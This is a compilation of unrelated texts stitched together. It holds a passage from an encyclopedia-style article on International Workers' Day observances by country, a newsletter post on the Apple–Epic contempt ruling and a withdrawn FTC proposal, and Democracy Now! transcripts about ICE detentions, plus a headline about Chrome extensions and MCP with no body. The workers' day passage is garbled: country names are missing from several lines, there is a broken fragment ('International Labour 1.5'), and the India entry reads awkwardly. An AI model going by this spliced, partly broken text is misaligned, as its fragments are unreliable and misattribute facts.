tear gas
have been widely used.
[
175
]
International Workers' Day is a public holiday in Ukraine, inherited from the Soviet era. The 1st May as a day of workers' solidarity in Kyiv began as early as 1894.
[
176
]
Until 2018, 2 May was also a public holiday (as in the Soviet era), instead in 2017
Western Christianity
's
Christmas
celebrated 25 December became a new Ukrainian public holiday.
[
177
]
[
178
]
The 1 May International Workers' Day remained a Ukrainian public holiday, although it was renamed (also in 2017) from "Day of International Solidarity of Workers" to "Labour Day".
[
178
]
According to Interior Minister
Arsen Avakov
during the 2016 International Workers' Day rallies in some major cities the number of
police officers
far outnumbered the number of rally participants.
[
181
]
With in
Dnipro
193 policemen protecting 25 rally participants.
[
181
]
New Zealand
workers were among the first in the world to claim the right for an eight-hour working day when, in 1840, the carpenter
Samuel Parnell
[
187
]
won an eight-hour day in
Wellington
. Labour Day was first celebrated in New Zealand on 28 October 1890.
[
188
]
Labour Day falls every year on the fourth Monday of October.
In Bangladesh, 1 May is a public holiday and called International Workers' Solidarity Day. A parade and other events are held on the day to commemorate the occasion.
[
189
]
In India, Labour Day is a not a public holiday on 1 May.
[
190
]
The International Workers' Day is tied to labour movements for communist and socialist political parties. Labour Day is known as "Uzhaipalar dhinam" in
Tamil
and was first celebrated in
Madras
, "Kamgar Din" in
Hindi
, "Karmikara Dinacharane" in
Kannada
, "Karmika Dinotsavam" in
Telugu
, "Kamgar Divas" in
Marathi
, "Thozhilaali Dinam" in
Malayalam
and "Shromik Dibosh" in
Bengali
. Since Labour day is not a national holiday, Labour day is observed as public holiday at
State Government
's discretion. Many parts especially in
North Indian States
it is not a public holiday.
[
191
]
The Labour Kisan party has introduced May Day celebrations in Madras. Comrade Singaravelar presided over the meeting. A resolution was passed stating that the government should declare May Day as a holiday. The president of the party explained the non-violent principles of the party. There was a request for financial aid. It was emphasised that workers of the world must unite to achieve independence.
1 May is also celebrated as "
Maharashtra Day
"
[
195
]
and "
Gujarat Day
" to mark the date in 1960, when the two western states attained statehood after the erstwhile
Bombay State
was divided on linguistic lines. Maharashtra Day is held at
Shivaji
Park in central
Mumbai
. Schools and offices in Maharashtra remain closed on 1 May. A similar parade is held to celebrate
Gujarat Day
in
Gandhinagar
.
Maldives
first observed the holiday in 2011, after a declaration by
President
Mohamed Nasheed
. He noted that this move highlighted the government's commitment as well as efforts of private parties to protect and promote workers' rights in the Maldives.
[
197
]
International Workers' Day has been celebrated in
Nepal
since 1963.
[
198
]
The day became a public holiday in 2007.
[
199
]
International Labour Day is observed in Pakistan on 1 May to commemorate the social and economic achievements of workers. It is a public and national holiday. Many organized street demonstrations take place on Labor Day, where workers and labor unions protest against labor repression and demand for more rights, better wages and benefits.
[
200
]
In Sri Lanka, International Workers' Day was declared a public, bank, and mercantile holiday in 1956.
[
201
]
The government has held official celebrations in major towns and cities, with the largest being in the capital,
Colombo
. During celebrations, it is common to witness party leaders greeting the crowds. Workers frequently carry banners with political slogans and many parties decorate their vehicles.
[
citation needed
]
In Cambodia, it is known as International Labour Day and is a public holiday.
[
202
]
No marches for labour day were permitted in Cambodia for several years after the
2013 Cambodian general election
and surrounding mass protests. A tightly controlled march on a limited scale was first permitted again in 2019.
[
203
]
Protest march in Jakarta, Indonesia, 1 May 2007
International Workers' Day, or Labour Day, in
Indonesia
was first observed by
Kung Tang Hwee
labour union in Semarang on 1918. The organizations such as
Sarekat Islam
,
Boedi Oetomo
, and Insulinde also took parts on strike that day through
Radicale Concentratie
alliance. But in 1927 the celebrations banned by the
Dutch East Indies
colonial government.
[
204
]
After independence, the 1 May labour's day observed again from 1946, with
Soekarno
, the first president of the Republic, always attended the labour's celebration, and two years later he signed Law No. 12 Year 1948 concerning worker's rights. The
Soeharto
's
New Order
regime banned the day's celebration again from 1967 because the day's association with Marxist and communist movements and changed the Labour Day to 20 February from 1973, the day which all the labour unions merged by the government into only one federation.
[
205
]
After the
fall of the New Order
, the day celebrated again as a rally day of labours and workers. The day officially made as a public holiday from 2014. Every year on the day, labourers take over the streets in major cities across the country, voicing their demands for better income & a supportive policy by the ministries.
[
206
]
In Myanmar, 1 May is known as Labour Day (
Burmese
:
အလုပ်သမားနေ့
) and is a public holiday.
[
208
]
1 May is known as "Labor Day" (
Filipino
:
Araw ng Manggagawa
, also known as
Araw ng Paggawa
) and is a
public holiday in the Philippines
. On this day, labour organizations and unions hold protests in major cities. On 1 May 1903, during the
American colonial period
the
Unión Obrera Democrática Filipina
(Filipino Democratic Labor Union) held a rally in front of the
Malacañang Palace
demanding workers' economic rights and Philippine independence. In 1908, the
Philippine Assembly
passed a bill officially recognizing 1 May as a national holiday. In 1913, the first official celebration was held on 1 May 1913 when 36 labour unions convened for a congress in
Manila
.
[
209
]
During the
Presidency of Gloria Macapagal-Arroyo
, a policy was adopted called
holiday economics
policy that moved holidays to either a Monday or a Friday to create a
long weekend
of three days. In 2002, Labor Day was moved to the Monday nearest to 1 May. Labour groups protested, as they accused the Arroyo administration of belittling the holiday.
[
210
]
By 2008, Labor Day was excluded in the holiday economics policy, returning the commemorations to 1 May, no matter what day of the week it falls on.
[
1
]
According to the decree "workers in public offices, private offices and factories throughout the country are entitled to a day off from work. International Labour 1.5 and still receive the same salary as a working day…".
[
213
]
On 1 May 1946 the first International Labour Day of the Democratic Republic of Vietnam was held.
[
213
]
In Bahrain, 1 May is known as Labour Day and is a public holiday.
[
214
]
In
Iran
, 1 May is known as the International Workers' Day. It is not a public holiday but according to article 63 of
Iranian labour law
on top of the official public holidays observed in the Islamic Republic of Iran, Labour Day shall be considered an official holiday for workers.
[
215
]
In
Iraq
, it is known as the International Workers' Day and is a public holiday.
[
216
]
Israel, 1 May 2007
After historically varying popularity of Labour Day, 1 May is not an official holiday in the
State of Israel
. In the 1980s there were several large marches in Tel Aviv, numbering as much as 350,000 in 1983 and perhaps even more in 1988, but a steady decline in numbers led to only 5,000 marchers in 2010. During the 1990s businesses began to treat it like a regular working day as the number of Labour Day-related activities decreased.
[
217
]
1 May is largely celebrated by the
former Soviet Jews
who
immigrated to Israel
in the 1990s.
[
citation needed
]
1 May is known as Labour Day and is a public holiday.
[
218
]
1 May known as the Workers' Day and is a public holiday. Left-wing parties and workers' unions organize marches on 1 May.
[
219
]
^
I saw a man, whom I afterwards identified as Fielding [
sic
], standing on a truck wagon at the corner of what is known as Crane's Alley. I raised my baton and, in a loud voice, ordered them to disperse as peaceable citizens. I also called upon three persons in the crowd to assist in dispersing the mob. Fielding got down from the wagon, saying at the time, "We are peaceable," as he uttered the last word, I heard a terrible explosion behind where I was standing, followed almost instantly by an irregular volley of pistol shots in our front and from the sidewalk on the east side of the street, which was immediately followed by regular and well directed volleys from the police and which was kept up for several minutes. I then ordered the injured men brought to the stations and sent for surgeons to attend to their injuries. After receiving the necessary attention most of the injured officers were removed to the County Hospital and I highly appreciate the manner in which they were received by Warden McGarrigle who did all in his power to make them comfortable as possible.
[
21
]
^
"In 1884 the first Monday in September was selected as the holiday, as originally proposed"
[
26
]
^
5월 1일을 근로자의 날로 하고 이 날을 "근로기준법"에 의한 유급휴일로 한다.
("The first day of May each year shall be designated as Workers' Day, which shall be a paid holiday under the '
Labor Standards Act
'.)"
[
103
]
^
The clashes were preceded by two circumstances: "the organizers deviated from the route allowed by the mayor's office," and the Moscow authorities decided to "obstruct the movement of the column along Leninsky Avenue." Subsequently, the authorities failed to rationally justify such a decision: the movement took place in the direction
from
the city center. The version that "the demonstrators are going to smash Gorbachev's dacha" remained unconfirmed.
The demonstrators, who were moving along Leninsky Avenue from Oktyabrskaya Square, noticing the truck barriers, as well as the cordon of police officers and OMON, reorganized, putting forward a vanguard of 500–600 people, the most organized part of which was the squad of the National Salvation Front. A few tens of meters before the cordon, the column stepped up and almost immediately broke through the cordon.
See the cited report by
Memorial
.
^
The Penguin Encyclopedia
. Penguin Books. 2004. p. 860.
Labour / Labor Day A day of celebration, public demonstrations, and parades by trade unions and labour organizations , held in many countries on 1 May or theheld in many countries on 1 May or the first Monday in May
^
"Labour Day 2024"
.
Times of India
. 1 May 2024.
International Workers' Day, which is also called Labour Day or May Day, is celebrated in many countries ... In India, Labour Day or May Day is celebrated on May 1 every year; while some countries mark this on the first Monday in May.
^
Hobsbawm, Eric
(10 July 2009).
"Birth of a Holiday: The First of May - Eric Hobsbawm"
.
libcom.org
.
Archived
from the original on 21 June 2021
. Retrieved
26 April
2021
.
In fact, the question was to be formally discussed at the Brussels International Socialist Congress of 1891, with the British and Germans opposing the French and Austrians on this point, and being outvoted.
^
a
b
The Bridgemen's magazine
. International Association of Bridge. Structural and Ornamental Iron Workers. 1921. pp.
443–
44.
Archived
from the original on 1 May 2023
. Retrieved
4 September
2011
.
^
"调与休:黄金周长假的变迁"
[Reconcile and rest: the change of Golden Week vacation].
People's Daily
(in Chinese).
Xinhua News Agency
. 27 November 2013.
Archived
from the original on 13 April 2022
. Retrieved
13 April
2022
.
从2000年国庆放假开始,对国庆、春节和劳动节这三个节的休假时间进行了统一调整,移动节日前后的两个周末四天和法定假期三天集中休假,这样共计7天时间[……]2008年,五一法定假期从3天改为1天,意味着五一黄金周被取消。
[Starting from the National Day holiday in 2000, the vacation time of the three festivals, National Day, Spring Festival and Labor Day, was adjusted, moving the two weekends before and after the holiday for four days and the legal holiday for three days to focus on vacation, so that a total of 7 days [...] In 2008, the May Day legal holiday was changed from 3 days to 1 day, meaning that the May Day Golden Week was cancelled.]
^
"
"五一"假期延长至5天 解读黄金周背后的假如"
["May Day" holiday extended to 5 days: Explaining the assumptions behind the Golden Week].
Xinhuanet
(in Chinese). Chengdu Business News. 28 November 2019.
Archived
from the original on 13 April 2022
. Retrieved
13 April
2022
.
2020年则是在延续2019年"五一"休假安排的基础上,进一步拓展,通过调休再多增加了一天节日休假时间,从而形成了5天的"小长假"。
[In 2020, on the basis of the continuation of the "May Day" vacation arrangement in 2019, it further expands by adding one more day of holiday vacation time through the transfer, thus forming a 5-day "mini vacation".]
^
"新闻背景:香港回归15年大事记"
[News Background: Events in the 15 years since Hong Kong's return to China] (in Chinese).
China News Service
. 1 July 2012.
Archived
from the original on 2 July 2012
. Retrieved
1 May
2024
.
^
Schedule for May 1 Labour Day march and two rival meetings in downtown Reykjavík | However many stores nowadays are open and pay higher salaries to the workers instead on this day.
^
Quinn, Ruairí (9 July 1993).
"Vote 44: An Chomhairle Ealaíon"
.
Dáil Éireann Debates
. Oireachtas. pp. Vol.433 No.8 p.61 c.2084.
Archived
from the original on 8 May 2018
. Retrieved
8 May
2018
.
The Programme for a Partnership Government also committed the Government to appoint the first Monday in May to be a public holiday with effect from 1994, in recognition of the centenary of the foundation of the Irish Trades Union Congress. In deciding to introduce a new public holiday, the Government also took account of the fact ... that nine of our EC partners have a public holiday early in May.
^
"Public holidays"
. Dublin: Citizens Information Board. 20 March 2018.
Archived
from the original on 17 November 2010
. Retrieved
8 May
2018
.
^
Gjerde, Åsmund Borgen; Thingsaker, Bjørn (2 May 2021).
"Første mai"
(in Norwegian).
Archived
from the original on 4 May 2021
. Retrieved
3 May
2021
– via Store norske leksikon.
^
M.V.S. Koteswara Rao.
Communist Parties and United Front – Experience in Kerala and West Bengal
.
Hyderabad
: Prajasakti Book House, 2003. p. 110
^
Report of May Day Celebrations 1923, and Formation of a New Party
The Hindu
quoted in Murugesan, K., Subramanyam, C.S.
Singaravelu, First Communist in South India
.
New Delhi
: People's Publishing House, 1975. p. 169
^
"2019"
.
bot.or.th
.
Archived
from the original on 1 May 2020
. Retrieved
16 October
2019
.
^
a
b
c
d
e
Nguyễn Thu Hoài (21 January 2018).
"Người lao động Việt Nam được nghỉ ngày 1.5 từ bao giờ?"
(in Vietnamese). Trung tâm Lưu trữ quốc gia I (National Archives Nr. 1, Hanoi) - Cục Văn thư và Lưu trữ nhà nước (State Records And Archives Management Department Of Việt Nam).
Archived
from the original on 16 July 2022
. Retrieved
4 February
2022
.
Ok, two quick pieces of good news. The first is that a judge in Northern California, Yvonne Gonzalez Rogers, issued a very harsh rebuke to Apple over its control of the iPhone app store. The order is part of a long-standing antitrust case brought by Epic Games against Apple
in 2020
.
In 2021, Epic Games lost on the Federal antitrust charges, but won on a state claim of unfair conduct, specifically over its refusal to let app developers communicate with or give consumers a place outside of the app store to pay for apps. The judge found that Apple’s conduct “allowed it to reap supracompetitive operating margins,” and ordered it to let app developers communicate with customers and buy apps outside the App store. The case went on appeal, with the Ninth Circuit upholding the decision and order. In January of 2024, the Supreme Court refused to hear the appeal, and Gonzalez Rogers’s order went into effect.
Since then, Apple has engaged in bad faith tactics to avoid complying. Today, Gonzalez Rogers sanctioned the company and
ordered
Apple to allow app developers to sell their apps outside of the App Store without a fee. That’s a huge deal. For some context, the New York Times says
that app store fees
“makes up a large portion of the nearly $100 billion in annual services revenue that Apple collects.”
Epic’s CEO was jubilant, explaining what the decision means.
That’s not all. For a year and a half, Apple has engaged in bad faith, levying a variety of different and new fees to app developers to get around the spirit of the judicial order. It put up scare screens, engaged in sleazy privilege claims, and lied under oath to the judge about its decision-making. Normally these kinds of tactics happen without consequence for important business executives. But this time, the judge accused Apple Vice-President of Finance, Alex Roman, of having “outright lied under oath,” and referred the matter to the U.S. Attorney for a criminal contempt investigation. She also went out of her way to blame Apple CEO Tim Cook directly.
It’s really worth reading these two full paragraphs of the judge’s decision.
In stark contrast to Apple’s initial in-court testimony, contemporaneous business documents reveal that Apple knew exactly what it was doing and at every turn chose the most anticompetitive option. To hide the truth, Vice-President of Finance, Alex Roman, outright lied under oath. Internally, Phillip Schiller had advocated that Apple comply with the Injunction, but Tim Cook ignored Schiller and instead allowed Chief Financial Officer Luca Maestri and his finance team to convince him otherwise. Cook chose poorly. The real evidence, detailed herein, more than meets the clear and convincing standard to find a violation. The Court refers the matter to the United States Attorney for the Northern District of California to investigate whether criminal contempt proceedings are appropriate.
This is an injunction, not a negotiation. There are no do-overs once a party willfully disregards a court order. Time is of the essence. The Court will not tolerate further delays. As previously ordered, Apple will not impede competition. The Court enjoins Apple from implementing its new anticompetitive acts to avoid compliance with the Injunction. Effective immediately Apple will no longer impede developers’ ability to communicate with users nor will they levy or impose a new commission on off-app purchases
Now that is brutal. Apple says it
will comply
, though it will also appeal the decision. That means tomorrow, developers will have a bunch of new options for how to sell apps; the whole app economy could change if the Ninth Circuit doesn’t issue a stay of the order, meaning that this decision is the first time we’ll see a big tech remedy in an antitrust case actually make a serious real-world difference
And here’s a headline that puts a fine point on what happened.
And now on to the second piece of good news. On Monday, I traced a
proposal
from Republican leader Jim Jordan, who chairs the House Judiciary Committee, to eliminate a key antitrust law, which is the Federal Trade Commission’s authority to ban “unfair methods of competition.” That’s the authority used in several important cases, including one involving Amazon, another targeting UnitedHealth Group and CVS, as well as a seed and chemical case where the defendants are Corteva and Syngenta. The committee hearing was today, and Jordan ultimately pulled the proposal.
Jordan was seeking to hide a significant change to antitrust underneath a procedural shift. His legislation would have merged the FTC’s competition division into the Department of Justice Antitrust Division, which sounds like some boring bureaucratic reshuffling, bit it’s not. The trick however, is though both enforcers apply the Sherman and Clayton Act, they also have different authorities. The FTC can go beyond the Sherman and Clayton Act, barring “unfair methods of competition” that don’t quite meet the standards of the other antitrust laws. And when Jordan put out text folding the FTC staff and resources into the Antitrust Division, he
didn’t
move the FTC’s extra authority to the Antitrust Division. So it was a tricky way to kill this authority, and harm the cases based on it.
In other words, it was a sneak attack. It makes sense why he’d try it this way; changing antitrust law is very hard. You need to pass it out of the House of Representatives with a majority, and then get 60 votes in the Senate. Jordan’s approach was to short-circuit this path by attaching this legislation to the much bigger tax cut bill moving forward, the hope being no one would really notice. Such an approach had two advantages. First, while individual Congressmen might not like each particular component of such a bill, most wouldn’t sink the whole thing over a shift of this authority. And second, the tax bill, for boring reasons, only requires 50 votes in the Senate.
Jim Jordan is a conservative Republican leader who is very well-respected on the right. But in this case, he stepped on a rake. Our work set off a bit of a firestorm. First, a host of former antitrust enforcers expressed concern, pointing out that the legislation wasn’t just a harmless set of seating chart changes. Naturally, the Democrats were not on board with rolling back antitrust law and weakening the FTC, with Congresswomen Becca Balint and Pramila Jayapal speaking out in the committee markup. That was important, though expected.
What was *not* expected was opposition from populist right and small business groups. Yesterday, Steve Bannon went on his show
War Room
with Mike Davis, a conservative anti-big tech foe. The two of them absolutely laid into Jordan for taking the side of firms like Meta and Google, and in their view undermining the Trump antitrust agenda. A lot of War Room listeners presumably called into Republican offices.
But that’s not all. There are a lot of business people, like pharmacists, app developers, grocers, and farmers who are reliant on the increasingly active antitrust enforcement regime. And some of them no doubt started getting into contact with GOP members on the committee. It’s rare for trade associations to move particularly quickly, but the National Grocers Association, which leads a coalition seeking to revive price discrimination laws, put out a note of concern.
Anyway, the net effect is that today, at the committee markup, Jordan quietly announced some technical changes to the bill. One of them was to eliminate the FTC provisions.
So there we go. The campaign against monopoly keeps rolling on, and I keep being surprised by how many wins we always seem to chalk up.
Discussion about this post
"They Shattered Our Dreams": NY Father Recounts How ICE Snatched His Son & Sent Him to El Salvador
Democracy Now!
www.democracynow.org
2025-05-01 13:24:56
As May Day protests call for worker and immigrant rights, we talk to a New York father whose 19-year-old son Merwil Gutiérrez, with an open asylum case, was detained in the Bronx and then flown with over 230 other Venezuelans to a mega-prison in El Salvador, where he is being held incommunicado. Wit...
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
This is
Democracy Now!
, democracynow.org. I’m Amy Goodman, with Nermeen Shaikh.
NERMEEN
SHAIKH
:
May Day demonstrations are underway worldwide, with mass protests across the United States today focused on workers’ rights and resistance to the Trump administration’s crackdown on immigrants and asylum seekers, including the transfer of over 230 men to El Salvador’s Terrorism Confinement Center,
CECOT
, infamous for its human rights abuses.
The protests come amid
reports
the Trump administration is seeking to send immigrants with criminal records to Rwanda and Libya. That’s according to
CNN
, which also reports the U.S. is seeking to send some asylum seekers apprehended at the U.S. border to Libya, including people with no criminal records.
This is Secretary of State Marco Rubio speaking at a Cabinet meeting Wednesday, sitting next to President Trump.
SECRETARY
OF
STATE
MARCO
RUBIO
:
We are actively searching for other countries to take people from third countries. So we are actively — not just El Salvador — we are working with other countries to say, “We want to send you some of the most despicable human beings to your countries. Will you do that as a favor to us?” And the further away from America, the better, so they can’t come back across the border.
NERMEEN
SHAIKH
:
This week, President Trump said he has the power to bring back Maryland father Kilmar Abrego Garcia, who the U.S. government admitted to expelling to an El Salvador prison “in error,” but that he will not do so, despite court orders.
It’s been two months since the Trump administration rounded up and transferred 238 Venezuelan immigrants from the U.S. to the notorious maximum-security mega-prison in El Salvador. The men are being held incommunicado, without access to their attorneys or relatives, languishing in what appears to be indefinite detention in
CECOT
.
AMY
GOODMAN
:
This week,
Democracy Now!
spoke to the father of a 19-year-old Venezuelan teenager who is among them. His name is Merwil Gutiérrez. He was detained by Immigration and Customs Enforcement,
ICE
, agents outside his apartment here in New York in the Bronx on February 24th. He was sent to El Salvador despite having an open asylum case in the U.S. Merwil’s family and lawyers note he has no criminal history, no tattoos — one of the features Trump officials have used to wrongfully accuse Venezuelan immigrants and others of being gang members and to expel them from the country without due process under the wartime Alien Enemies Act of 1798.
Merwil’s cousin, Luis Acosta, witnessed the February arrest from his window. He described seeing at least 10 officers ambushing Merwil and questioning him. His cousin says authorities were searching for a different person, but they forcibly took Merwil away anyway, knowing he was not that person. One of the officers grabbed the teen by the arm and put him inside a car. Merwil’s father, Wilmer Gutiérrez, says he’s been unable to communicate with his son since he was taken to an
ICE
jail in Texas, then transferred to El Salvador in March.
Democracy Now!
's Juan González and I spoke with Wilmer Gutiérrez through a translator. We were also joined by Ethar El-Katatney, editor-in-chief of Documented, a nonprofit newsroom focusing on New York's immigrant community, that broke Merwil’s story in a
report
headlined ”
ICE
Took His Son from Their Bronx Home. Now His 19-Year-Old Is in Bukele’s Mega-Prison in El Salvador.” It was written by Paz Radovic. I began by asking Wilmer Gutiérrez to describe what happened to his son.
WILMER
GUTIÉRREZ:
[translated] Good morning. My name is Wilmer. I am Merwil Gutiérrez’s father. The day he was arrested, he was entering the building where we live. That day, I was working, and my nephew called me and told me that my son was being grabbed by the police to take him away, without explanation. They were apparently looking for another person, and they grabbed my son, handcuffed him and put him in the car. One of the policemen asked him his name. He replied that it is Merwil. And the policeman said, “No, he’s not who we want.” Since the good ones are the bad ones, too, the other police said, “No, take him anyway.” And they took my son to the precinct. I returned to the precinct. I thought that he was going to be released that same night and they were going to let him go back home, because I know my son was not doing anything wrong. He was just going into our building when they arrested him.
JUAN
GONZÁLEZ:
Mr. Gutiérrez, could you tell us, when did you learn that he had been transferred to El Salvador?
WILMER
GUTIÉRREZ:
[translated] I found out that they had sent him to El Salvador when he contacted me Saturday morning. And from that point on, I had no further communication with him. When they were sending flights to El Salvador, we learned that they had taken a group of Venezuelans. At that time, they had not sent any planes deporting Venezuelans to their home country. We inquired, but couldn’t obtain any information until a list of names of everyone who was deported came out, and my son’s name was on that list.
JUAN
GONZÁLEZ:
Do you feel betrayed by the government, that the same government that allowed you to come into the United States with humanitarian parole has now sent your son to another country to prison?
WILMER
GUTIÉRREZ:
[translated] Yes, indeed. Because we came here with a dream, we did not think that this injustice was ever going to happen. My son has not committed any crime. He never appeared in front of a court. He was not charged with a crime or had a trial. No, they grabbed him and then put him on a plane and took him to El Salvador, and that’s where they have sent others. They were kidnapped, because they did not go through a formal process, nor did they sign any papers saying where they were going. We hope that if they put him on a plane, they would return my son to Venezuela, where we have family. And look where he ended up, where his rights as a human being are being violated right now. They shattered our dreams.
AMY
GOODMAN
:
I want to bring Ethar El-Katatney into this conversation, the editor-in-chief of Documented. As we hear this utterly painful story that Wilmer conveys about his teenage son being taken to the notorious Salvadoran prison, I want to go back to that night, February 24th. As your reporter at Documented has told this story, interviewed the cousin, explain exactly what he saw and heard the agents doing.
ETHAR
EL-
KATATNEY
:
Thanks, Amy, for having me. Thank you for sharing your story so honestly.
And I think, before I just get to that, I just wanted to add that, you know, when we hear about the numbers, and you hear 238 kind of deported, it’s kind of sometimes easy to forget that these are real human lives and real impact. You know, an investigation showed that out of those 238 young people, nearly 75% of them actually have no criminal record, right? And we at Documented are continuing to follow similar stories, other young men in their early twenties who also have no criminal records and who were also deported.
So, part of what we do at Documented which is so unique, which is we are directly connected to immigrant communities, right? And we actually film the story through WhatsApp. Raz, our reporter, is in a group where she actually managed to get in touch with Wilmer. So, when we sent her to the community, obviously, developing kind of trust, being able to discuss with his family.
So, Luis, who has actually left now their apartment, out of fear that he would also be kind of caught up in a collateral arrest, which is exactly what we think was happening here, he was upstairs and actually saw it through a window. He said he saw nearly a dozen agents kind of gathering around. And what really made this so unique, which is he heard one agent talking about how this isn’t who they were looking for, and another agent say, “But take him anyway.”
And I would say that kind of pervasive fear that we’re seeing now in immigrant communities, which is, even if you have no criminal record, even if you have status, even if you have a legal case, even if the Supreme Court has argued that you have a right to argue against your deportation, you might still be taken away. So, this case, as tragic as it is, we’re seeing it play out in multiple ways across the country and in New York.
AMY
GOODMAN
:
So, talk about how the administration has responded. I mean, even when they publicly say, as in the case of Kilmar, they publicly say they made a mistake, they also say they’re not going to bring back Kilmar Abrego Garcia. They said it in court to a judge. But talk about what the — how the Trump administration has responded, and what access that Wilmer has to the courts right now.
ETHAR
EL-
KATATNEY
:
Yeah. I would say that in this case, you know, the administration talked about it being an administrative error — right? — and having no right, which is a step kind of even beyond —
AMY
GOODMAN
:
In Kilmar’s case.
ETHAR
EL-
KATATNEY
:
In Kilmar’s case, that it was an administrative error and that we can’t do anything. So, even if you have the courts now saying that they actually have to facilitate his return, the administration actually isn’t doing anything. And now you have kind of a search and proceedings to see, like: Are they actually stopping this?
I would say, in Wilmer’s case, he’s gotten a lot of media attention. But up until this day, even though we talked directly to, you know, politicians across the spectrum — we directly had an exclusive statement from Alexandria Ocasio-Cortez expressing kind of, you know, their disillusionment, their disappointment, their kind of “we will take action” — to this day, there really has been no update on the case. The lawyer in the case involved has no updates. We still don’t actually know if he’s fully — what his situation is, what he is. And again, to remind everybody, he’s 19 years old, Venezuelan, deported to a prison not even in his country. And despite the media attention, there really has been no update as of yet.
AMY
GOODMAN
:
Wilmer, I know how incredibly hard this is for you. Talk about your decision to speak out.
WILMER
GUTIÉRREZ:
[translated] Well, I am doing this so that the violation that they did to all Venezuelans, including my son, is known throughout the world, because it is really anti-human that they grab the person and treat them as they please and violate their rights. If they do not want us here, they should deport them to their native country, not send them to a prison, because they are not terrorists. They are not gang members. They do not belong to any gang or anything like that.
So they are violating my son’s rights, and they are damaging his mind. My son is still a child. His mentality has not matured yet. And right now they are damaging his mind. Imagine what he is feeling at this moment there. Every day he wakes up knowing that they have not yet taken him out of that place where they have kidnapped him, where they are violating his human rights.
I decided to speak out because I really want this to be heard, even by the president of El Salvador himself. And we ask him to respect those Venezuelans, because my son has nothing to do with all this. He has not had any problem with that country. And the president of El Salvador should release him.
AMY
GOODMAN
:
Wilmer, talk about the risk you’re taking in coming forward. Are you afraid that you could be next, even if your son was mistakenly taken?
WILMER
GUTIÉRREZ:
[translated] Well, fear is something that they instill in us, but I am not afraid, because if you look at what is happening to my son, and if something happens to me, the only thing that matters is that at least I made people aware of what has happened to my son. I made them understand that the government is violating the laws. And if they do something against people like myself who are advocating for our relatives, then they will realize that what they are doing is a violation of human rights, because they do not want to respect the laws. They are violating them. The courts told them not to fly those planes to El Salvador, and they still did it. We can imagine what is going to happen going forward if they do not put a stop to this government, because they are violating all the laws and doing whatever they want.
AMY
GOODMAN
:
Have you ever been apart from Merwil this long, for two months?
WILMER
GUTIÉRREZ:
[translated] Merwil and I have always been practically like brothers, always together, until now that they have separated us.
AMY
GOODMAN
:
Do you have hope that he’ll be released, that you’ll see him here again?
WILMER
GUTIÉRREZ:
[translated] Merwil and I have lived together all our lives. He has always been with me, and the only time we weren’t together is when he was in classes in high school focusing on his studies. He would always walk with me, work with me. When we were still living in Venezuela, we were always together. And as I’m telling you now, we had never been separated, until now they have separated us. And it is very hard.
AMY
GOODMAN
:
If you could talk to your son right now, if you could talk to Merwil, look right into the camera, and what would you say to him?
WILMER
GUTIÉRREZ:
[translated] Well, my message to Merwil, if he hears me, he is to be strong. God is with us, and he needs to know that we are doing everything possible to get him out of there soon. His family in Venezuela is doing everything they can, just like me here. I am making my voice heard, so that it is heard and reaches the ears of everyone, and that justice is done, because, I told you from my heart, he is not a criminal. Not all Venezuelans are doing what Trump’s government says we are doing. And I hope they have a little respect for that, too. If they want to send everyone to their home country, do it with due process, not how they are doing it, as if we were criminals. Even animals don’t deserve that. They treat us as if we were a commodity. And from my heart, I tell Merwil that we are doing everything possible and that we will be together soon.
AMY
GOODMAN
:
Wilmer Gutiérrez, father of 19-year-old Merwil Gutiérrez, who was detained by Immigration and Customs Enforcement, by
ICE
agents, outside his apartment here in New York in the Bronx on February 24th and was sent to El Salvador, despite having an open asylum case in the U.S. He has not been heard from since. At
CECOT
, they’re kept incommunicado. We’ll link to the
report
on this case by Documented, headlined ”
ICE
Took His Son from Their Bronx Home. Now His 19-Year-Old Is in Bukele’s Mega-Prison in El Salvador.” And you can go to our full interview with Wilmer about Merwil at our website in Spanish at
democracynow.org/es
.
When we come back, as the United States and Ukraine sign a new rare earth minerals deal, we’ll speak to the environmental journalist Antonia Juhasz. Her new piece, “Is Trump’s 'Minerals Deal' a Fossil Fuel Shakedown?” Stay with us.
[break]
AMY
GOODMAN
:
“Power in a Union,” performed by Billy Bragg in our
Democracy Now!
studio in 2011.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Trust Me, I'm Local: Chrome Extensions, MCP, and the Sandbox Escape
"I Am Not Afraid of You": Mohsen Mahdawi's Defiant Message to Trump After Release from ICE Jail in VT
Democracy Now!
www.democracynow.org
2025-05-01 13:13:26
Columbia University student and Palestinian activist Mohsen Mahdawi has been released on bail by a Vermont judge after more than two weeks in U.S. immigration custody. “I am saying it clear and loud to President Trump and his Cabinet: I am not afraid of you,” he told supporters as he lef...
This is a rush transcript. Copy may not be in its final form.
NERMEEN
SHAIKH
:
We begin today’s show in Vermont, where Columbia University student and Palestinian activist Mohsen Mahdawi was released after more than two weeks in U.S. immigration custody. Mahdawi is a green card holder from Palestine who was born and raised in a refugee camp in the occupied West Bank. He was arrested on April 14th when he appeared for what he was told would be a citizenship interview. Mahdawi had participated in the Palestinian solidarity protests at Columbia last year. He was also president of the Columbia University Buddhist Association.
He was freed on bail on Wednesday by U.S. District Judge Geoffrey Crawford, who criticized the Trump administration’s handling of the case. In his ruling, Crawford wrote that Mahdawi had made, quote, “substantial claims that his detention is the result of a retaliation for protected speech that he engaged in as a college student on the Columbia campus.” Crawford went on to write, quote, “The court also considers the extraordinary setting of this case and others like it. Legal residents — not charged with crimes or misconduct — are being arrested and threatened with deportation for stating their views on the political issues of the day. Our nation has seen times like this before, especially during the Red Scare and Palmer Raids of 1919-1920 that led to the deportation of hundreds of people suspected of anarchist or communist views,” Crawford wrote.
AMY
GOODMAN
:
After Mohsen Mahdawi left the federal courthouse in Burlington, Vermont, he addressed supporters.
MOHSEN
MAHDAWI
:
And we send a clear message, as well, that if we have faith in our beliefs, unshakable beliefs, which is the belief that justice is inevitable, we will not fear anyone, because our fight is a fight for love, is a fight for democracy, is a fight for humanity. And I am saying it clear and loud to President Trump and his Cabinet: I am not afraid of you. …
Never give up on the idea that justice will prevail and that we have to come together to bring our voices and our hearts and raise them, not only for America, not only for this system of democracy that has checks and balances — and this court is part of it — but also for our humanity. We have to restore and reform the international order and abide by international law as the first step towards justice. We must stand up for humanity, because the rest of the world, not only Palestine, is watching us, and what is going to happen in America is going to affect the rest of the world.
